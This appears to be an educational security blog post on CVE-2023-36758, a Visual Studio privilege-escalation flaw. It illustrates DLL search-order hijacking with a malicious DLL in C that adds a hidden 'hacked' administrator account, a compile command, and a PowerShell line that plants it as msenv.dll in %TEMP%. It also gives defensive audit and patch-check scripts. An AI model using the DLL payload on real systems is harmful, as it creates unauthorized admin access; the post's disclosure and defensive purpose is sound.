Visual Studio is one of the most widely used integrated development environments (IDEs), published by Microsoft and relied on by millions of developers. In September 2023, Microsoft fixed a vulnerability in it, tracked as CVE-2023-36758, that lets a local attacker gain higher privileges on an affected system. This post explains what the bug is, how this class of bug works, how it could be exploited (for educational purposes), and how you can protect your systems.
What is CVE-2023-36758?
CVE-2023-36758 is an Elevation of Privilege (EoP) vulnerability found in certain versions of Microsoft Visual Studio. It was disclosed and patched as part of the September 2023 Patch Tuesday updates.
Official Advisory
You can read the official Microsoft advisory here:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36758
How Does the Vulnerability Work?
At a high level, this is an elevation of privilege: a Visual Studio component that runs with more privilege than the logged-on user can be made to execute attacker-controlled code. Microsoft's advisory does not publish the root cause, so the rest of this post walks through the DLL search-order hijack pattern, a common way this kind of Windows EoP bug plays out, as a worked illustration rather than a verified chain.
The Core Problem
Visual Studio relies on helper processes and on files that live in directories a standard user can write to, such as the user's own %TEMP% or shared folders with overly permissive access control lists (ACLs). If a component that runs with higher privileges loads a DLL or executable from one of those locations, an attacker who drops a rogue file there can "hijack" the load and run their payload at that higher privilege.
For example, when Visual Studio launches a tool or extension, the loader may request a DLL by bare name and walk the Windows DLL search order (application directory, system directories, the current directory, then each PATH entry). If any directory consulted before the legitimate DLL's location is writable by the user, that search order can be exploited.
Simple Exploit Scenario
Let’s see how an attacker could exploit this, step by step.
1. Find an Attacker-Writable Folder
Suppose Visual Studio resolves a DLL from %TEMP% because of its search-order logic. %TEMP% is the user's own temp directory, so a regular (non-admin) user can write there. The hijack only elevates if the search is performed by a process with higher privileges, for example the same user's Visual Studio started with "Run as administrator" or an elevated helper process.
2. Craft a Malicious DLL
The attacker prepares a DLL whose entry point runs code to, say, add a new admin user or spawn an elevated shell. One practical caveat: if the host loads the DLL implicitly through its import table, the rogue DLL must also export the names the host imports (or forward them to the real DLL), or the loader rejects it before DllMain runs; for LoadLibrary-style loads, DllMain runs first.
malicious.c
#include <Windows.h>
#include <stdlib.h>

/* Runs when the DLL is mapped into the victim process. If that process is
   elevated, so are these commands. Note: system() inside DllMain executes
   under the loader lock, which is fragile; a real payload would spawn a
   thread or call CreateProcess instead. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH) {
        system("net user hacked Passwrd! /add");
        system("net localgroup administrators hacked /add");
    }
    return TRUE;
}
Compile this DLL from a Developer Command Prompt (the /LD switch produces malicious.dll):
cl /LD malicious.c
3. Drop the Malicious DLL
The attacker copies malicious.dll into the attacker-writable directory (e.g., %TEMP%), renamed to the file name the target process searches for.
4. Trigger the Hijack
The attacker starts Visual Studio, or triggers a feature (extension, custom build step, or debugging session) that loads a DLL by name from a location the attacker controls.
If the loading process runs as administrator, or the load happens inside an elevated helper process or COM server, the attacker's DllMain executes with those privileges.
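The step-1 search in "Find an Attacker-Writable Folder" and the search-order discussion under "The Core Problem" both come down to one question: which directories does Windows consult for a bare DLL name, and which of them can the current user write to? The script below is an added example, not code from the original post or from Microsoft. It reproduces the documented default (SafeDllSearchMode) search order and probes each directory by creating and deleting a file. Assumptions: $AppDir is the folder of the executable you are auditing (it defaults to the PowerShell host's own directory); %TEMP% is not on the default search order, so it only shows up here if the process's current directory or a PATH entry points there.

```powershell
# Added example (not from the original post): list the directories Windows
# searches for an unqualified DLL name under the default SafeDllSearchMode
# order, and report which of them the current user can create files in.
# A writable directory that is searched before the legitimate DLL's home is
# a hijack candidate. Assumption: the order below is the documented default;
# it is not taken from Visual Studio's own loader configuration.
param(
    # Directory of the executable you are auditing (devenv.exe's folder, for
    # instance). Defaults to the PowerShell host's own directory.
    [string]$AppDir = $PSHOME
)

function Get-DllSearchPath {
    param([string]$AppDir)
    $dirs = @(
        $AppDir                                    # 1. application directory
        (Join-Path $env:SystemRoot 'System32')     # 2. system directory
        (Join-Path $env:SystemRoot 'System')       # 3. 16-bit system directory
        $env:SystemRoot                            # 4. Windows directory
        (Get-Location).Path                        # 5. current working directory
    )
    # 6. every PATH entry, in order; empty entries are skipped
    $dirs += @($env:PATH -split ';' | Where-Object { $_.Trim() -ne '' })
    return $dirs
}

function Test-UserWritable {
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    # Probe by creating and deleting a uniquely named file. This reflects the
    # effective ACL (inherited and deny entries included) without parsing it.
    $probe = Join-Path $Dir ('hijack-probe-' + [guid]::NewGuid().ToString() + '.tmp')
    try {
        New-Item -ItemType File -Path $probe -ErrorAction Stop | Out-Null
        # Create-but-not-delete is still "writable"; ignore a failed cleanup.
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

$order = 0
foreach ($dir in Get-DllSearchPath -AppDir $AppDir) {
    $order++
    [pscustomobject]@{
        Order     = $order
        Directory = $dir
        Writable  = Test-UserWritable -Dir $dir
    }
}
```

Run it as the low-privileged user whose access you want to measure, for example `.\Find-WritableSearchPath.ps1 -AppDir 'C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE'` (path given as an example; adjust to the installed edition). Any entry marked Writable that appears before the directory that actually holds the DLL is a candidate for planting a rogue file; whether that gains privilege still depends on an elevated process performing the search.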
Real-World Impact
This is a local privilege escalation bug: the attacker must already be able to run code as a user on the machine, which is within reach of insiders, malware, or anyone with initial access. Once exploited, they can fully take over the system, install software, steal data, or use the host as a launch pad for further attacks.
Important: there is no remote code execution here; a network attacker must first get code running on the box.
Here's a simplified PowerShell example that stages the hijack:
# The DLL would be compiled as shown above. The destination file name must be
# one the target process actually searches for; msenv.dll is used here only as
# an illustration.
Copy-Item -Path "C:\Users\attacker\malicious.dll" -Destination "$env:TEMP\msenv.dll"
# Now start Visual Studio (elevated, via 'runas' or "Run as administrator", if
# the bug needs it) or trigger the feature that performs the load.
# When the elevated process resolves msenv.dll from %TEMP%, the payload runs.
Note: a working exploit depends on the exact file and DLL load paths, which vary with the Visual Studio version and installed extensions. The advisory does not publish them, so the steps above describe the generic hijack pattern, not a verified chain against a specific build.
Apply patches
Microsoft fixed this bug in the September 2023 Visual Studio releases. Open the Visual Studio Installer (or Help > Check for Updates inside the IDE) and update every installed instance, including Build Tools and Preview channels; the advisory lists the affected versions and the updates that address them.
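Machines often carry several Visual Studio instances (different editions, Build Tools, a Preview channel), and each servicing line gets its own fixed build. The script below is an added example, not code from the original post or from Microsoft. It uses vswhere.exe, which ships with the Visual Studio Installer, to enumerate every instance and compares each one's version with the first fixed build for its "major.minor" line. Assumption: you supply those fixed builds in $FixedVersions from the advisory; no build numbers are hard-coded here.

```powershell
# Added example (not from the original post): enumerate every Visual Studio
# instance on the machine with vswhere.exe and compare each one's version
# with the first fixed build for its servicing line. Assumption: the caller
# fills $FixedVersions from the advisory; nothing is hard-coded here.
param(
    # Map of servicing line ("major.minor") to first fixed build, e.g.
    # @{ '17.7' = '<build from advisory>'; '17.6' = '<build from advisory>' }
    [Parameter(Mandatory = $true)]
    [hashtable]$FixedVersions
)

# vswhere lives under the 32-bit Program Files even on 64-bit Windows.
$vswhere = Join-Path ${env:ProgramFiles(x86)} 'Microsoft Visual Studio\Installer\vswhere.exe'
if (-not (Test-Path -LiteralPath $vswhere)) {
    throw "vswhere.exe not found at $vswhere; is the Visual Studio Installer present?"
}

# -all includes incomplete instances, -prerelease includes Preview channels,
# -products * includes Build Tools and other non-IDE products.
$instances = & $vswhere -all -prerelease -products '*' -format json | ConvertFrom-Json

foreach ($inst in $instances) {
    $ver  = [version]$inst.installationVersion
    $line = '{0}.{1}' -f $ver.Major, $ver.Minor

    if ($FixedVersions.ContainsKey($line)) {
        $fixed  = [version]$FixedVersions[$line]
        $status = if ($ver -ge $fixed) { 'patched' } else { 'VULNERABLE: update' }
    } else {
        $fixed  = $null
        $status = 'no fixed build supplied for this line'
    }

    [pscustomobject]@{
        DisplayName = $inst.displayName
        Line        = $line
        Version     = $ver
        FixedBuild  = $fixed
        Path        = $inst.installationPath
        Status      = $status
    }
}
```

Invoke it as `.\Check-VsPatch.ps1 -FixedVersions @{ '17.7' = '<fixed build from the advisory>' }`, adding one entry per servicing line you have installed. An instance reported as "no fixed build supplied for this line" is not necessarily safe; it just means you did not give the script a threshold for that line.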
References & Further Reading
- Microsoft Security Advisory for CVE-2023-36758: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36758
- Microsoft Patch Tuesday (September 2023)
- DLL Search Order / Hijacking Explained (FireEye blog)
- Visual Studio Security Updates
Conclusion
CVE-2023-36758 is a classic example of how even trusted, widely used tools become a security problem when they mishandle files and processes. If you build, debug, test, or run code on Windows, keep your tools up to date, and know which of your processes run elevated and where they load code from.
Stay patched and stay safe!
Disclaimer: This post is for educational purposes only. Don’t use this information to break the law or harm others. Always act ethically and legally.
Timeline
Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 19:38:00 UTC